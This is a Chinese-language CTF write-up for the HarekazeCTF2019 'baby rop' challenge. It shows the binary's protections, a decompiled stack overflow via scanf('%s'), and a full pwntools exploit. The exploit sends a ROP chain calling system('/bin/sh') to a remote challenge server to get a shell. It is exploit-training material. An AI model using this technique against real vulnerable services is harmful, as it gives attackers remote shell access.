HarekazeCTF2019 baby rop
# HarekazeCTF2019 baby rop
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/HarekazeCTF2019_baby_rop/babyrop'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
1
2
3
4
5
6
2
3
4
5
6
# 静态分析
主函数如下
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4; // [rsp+0h] [rbp-10h]
system("echo -n \"What's your name? \"");
__isoc99_scanf("%s", &v4);
printf("Welcome to the Pwn World, %s!\n", &v4);
return 0;
}
1
2
3
4
5
6
7
8
9
2
3
4
5
6
7
8
9
Gadget
ROPgadget --binary babyrop --string "/bin/sh\x00"
Strings information
============================================================
0x0000000000601048 : /bin/sh
1
2
3
4
2
3
4
# 思路分析
- 目前信息:
- 明显的栈溢出漏洞
plt表内有system- 存在
/bin/sh字符串 - No PIE
- NX 保护
- 思路:
- 可栈溢出,有
system,有/bin/sh,构造rop链布好栈帧输入即可
- 可栈溢出,有
# exp
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
pwnfile = '/root/pwn/buuctf/HarekazeCTF2019_baby_rop/babyrop'
io = remote('node4.buuoj.cn', 26190)
# io = process(pwnfile)
elf = ELF(pwnfile)
padding = 0x10+8
system_addr = elf.plt['system']
bin_sh = 0x601048
pop_rdi_ret = 0x400683
payload = flat(['a'*padding, pop_rdi_ret, bin_sh, system_addr])
io.recv()
io.sendline(payload)
io.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
2
3
4
5
6
7
8
9
10
11
12
13
14
上次更新: 2022/08/15, 00:29:49